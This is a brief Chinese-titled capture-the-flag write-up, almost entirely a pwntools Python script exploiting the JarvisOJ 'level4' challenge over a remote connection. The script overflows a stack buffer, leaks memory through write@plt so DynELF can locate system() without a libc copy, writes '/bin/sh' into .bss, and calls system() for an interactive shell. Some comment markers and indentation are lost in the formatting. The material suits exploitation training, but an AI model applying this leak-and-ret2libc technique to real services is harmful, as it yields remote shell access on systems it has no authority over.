借助DynELF实现无libc的漏洞利用小结

#!/usr/bin/env python

coding:utf-8

from pwn import *

elf = ELF('level4')

write_plt = p32(elf.symbols['write'])

start_addr = p32(elf.symbols['_start'])

read_plt = p32(elf.symbols['read'])

data_addr = p32(elf.symbols['__bss_start'])

junk = "A" * (0x88 + 4)

Io = remote("pwn2.jarvisoj.com", 9880)

def leak(addr):

payload = junk + write\_plt + start\_addr + p32(1) + p32(addr) + p32(4)

Io.send(payload)

leaked = Io.recv(4)

print "\[%s\] -> \[%s\] = \[%s\]" % (hex(addr), hex(u32(leaked)),  repr(leaked))

return leaked

leak the address of system()

d = DynELF(leak, elf=ELF("./level4"))

system_addr = d.lookup('system', 'libc')

print "[system()] -> [%s]" % (hex(system_addr))

write /bin/sh

payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)

Io.send(payload)

send /bin/sh

Io.send("/bin/sh\x00")

call system

#read_output()

payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr

Io.send(payload)

interactive()

Io.interactive()